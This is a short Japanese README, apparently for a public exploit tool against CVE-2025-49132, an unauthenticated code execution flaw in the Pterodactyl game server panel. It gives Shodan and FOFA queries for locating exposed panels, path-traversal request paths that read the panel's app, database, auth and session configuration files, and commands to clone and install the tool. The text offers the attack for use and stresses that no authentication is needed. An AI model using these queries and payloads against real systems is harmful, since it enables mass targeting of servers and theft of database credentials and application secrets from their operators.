
CVE-2025-49132 用のエクスプロイトツール — Pterodactyl ゲームサーバーパネルに影響する、認証不要の重大な任意コード実行脆弱性です。
Pterodactyl パネルにおける重大な ACE 脆弱性で、認証されていないリモート攻撃者が任意のコードを実行できるようになり、システム全体の侵害につながる可能性があります。
認証は不要です。脆弱なインスタンスがあれば十分です。
Shodan
http.title:"Pterodactyl"
FOFA
"Pterodactyl"
locales/locale.json?locale=../../../pterodactyl&namespace=config/app
locales/locale.json?locale=../../../pterodactyl&namespace=config/database
locales/locale.json?locale=../../../pterodactyl&namespace=config/auth
locales/locale.json?locale=../../../pterodactyl&namespace=config/session
git clone https://github.com/yurahshell/CVE-2025-49132
cd CVE-2025-49132
pip install -r requirements.txt
| ソフトウェア | ステータス |
|---|---|
| Pterodactyl Panel |